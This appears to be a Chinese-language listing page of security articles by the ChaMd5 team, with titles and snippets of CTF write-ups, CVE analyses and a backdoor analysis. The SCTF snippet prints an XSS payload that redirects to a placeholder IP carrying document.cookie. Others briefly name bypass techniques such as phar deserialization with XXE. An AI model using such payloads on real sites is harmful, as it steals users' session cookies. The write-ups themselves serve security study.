ChaMd5安全团队

LV0
发表了文章

2019红帽杯 writeup

可以rce,在博客上找到的⼀条5.2.0的链,phar反序列化,上传phar.xml(改后缀),然后xxe⽤

ChaMd5安全团队
C++
发表了文章

php-fpm Remote Code Execution 分析(CVE-2019-11043)

国外安全研究员 Andrew Danau发现向服务器请求的URL中包含%0a 符号时,服务返回异常,疑似存在漏洞。

ChaMd5安全团队
Windows单片机GitGitHubNginx
发表了文章

【翻译】看我如何利用PHP的0day黑掉Pornhub并获得2W美刀奖励

在分析了Pornhub使用的平台之后,我们在其网站上检测到了unserialize函数的使用,其中的很多功能点(例如上传图片的地方等等)都受到了影响,例如下面两...

ChaMd5安全团队
PHP文件存储httpsC 语言网络安全
发表了文章

SUCTF2019-GuessGame详解

之前参加了2019 SUCTF,遇见了一道MISC题,看源码和phithon师傅的文章去了解它的opcodes,但是最终还是没做出来,因为文档实在是太少了,所以...

ChaMd5安全团队
文件存储游戏Python
发表了文章

国际数字经济博览会安全大赛-Aliyun&Qcloud详细writeup

这次跟着Venom的师傅们一起参加了国际数字经济博览会的线下赛,谢谢师傅们带躺到第三hhh,CTF解题赛的三道云安全的题目感觉还挺经典的,拿了其中一道Aliyu...

ChaMd5安全团队
网络安全SQL
发表了文章

TeamViewer攻陷疑云

TeamViewer是一个可用于Microsoft Windows、macOS、Linux、Chrome OS、iOS、Android、Windows RT、W...

ChaMd5安全团队
apt-getWindowshttps网络安全安全
发表了文章

SSTI Bypass 分析

护网杯过去不久,realworld到来之前先来研究研究SSTI的Bypass套路。

ChaMd5安全团队
https网络安全PythonHTML
发表了文章

“送给最好的TA.apk”简单逆向分析

20190927收到一个apk,名字叫“送给最好的TA.apk”。文件哈希值如下:

ChaMd5安全团队
网络安全LuaAndroidJava
发表了文章

phpstudy后门文件分析以及检测脚本

2019.9.20得知非官网的一些下载站中的phpstudy版本存在后门文件,基于研究的目的,于是有了以下这文。

ChaMd5安全团队
PHPXML网络安全编程算法
发表了文章

"数字经济"云安全公测大赛 WriteUp

Java 和 python 的 RSA 私钥加密略有不同,所以不浪费时间,直接从 apk 里抠出来加密部分,注意需要处理一下 base64 部分

ChaMd5安全团队
网络安全
发表了文章

CVE-2019-0708微软RDP远程代码执行漏洞复现

BlueKeep(CVE-2019-0708)是微软远程桌面协议(RDP)实现中发现的一个安全漏洞,它允许远程执行代码。

ChaMd5安全团队
https网络安全WindowsGitHubGit
发表了文章

virink的web题

这里发现服务器是用OpenResty服务器,这里pcat科普下:OpenResty是一个基于Nginx与Lua的高性能Web平台,其内部集成了大量精良的Lua库...

ChaMd5安全团队
NginxLuaGitHub编程算法网站
发表了文章

SUCTF-WriteUp(上)

https://gist.github.com/ed22c1ad2dc22c56f266a92635a9591c#file-str_or_str-php

ChaMd5安全团队
游戏编程算法httpsPHP网络安全
发表了文章

SUCTF-WriteUp(下)

而后就有了几次任意地址读且栈溢的机会,因此直接在任意地址读时读取伪造CPPEH_RECORD需要的其他信息(cookie等)

ChaMd5安全团队
C#HTTP网络安全编程算法
发表了文章

网络与信息安全领域专赛-WriteUp

gamectf.com. 600 IN TXT "flag{welcome_TXT}"

ChaMd5安全团队
PHP游戏编程算法
发表了文章

De1CTF 2019-WriteUp-PWN

ChaMd5安全团队
发表了文章

De1CTF 2019-WriteUp

外层部分和 N1CTF-2018 easy_harder_php 完全一样,参考:

ChaMd5安全团队
数据库SQL
发表了文章

SCTF WriteUp

使用跳转方式绕过 CSP: location.href=`//xxx.xxx.xxx.xxx/?${document.cookie}`

ChaMd5安全团队
发表了文章

Defcon China 1.0 胸卡破解笔记

不会IOT, 不会逆向, 也没去听破解胸卡的 workshop, 本菜鸡在 @hook 师傅指引下完成了这次”破解“,在此记录一下,供大家看个热闹。

ChaMd5安全团队
单片机IDE
发表了文章

RCTF WriteUp(Web篇+PWN篇)

解题思路 给了一个GET形式的一句话,查看phpinfo有open_basedir限制,利用glob:///*绕过

ChaMd5安全团队

个人简介

个人成就

扫码关注云+社区

领取腾讯云代金券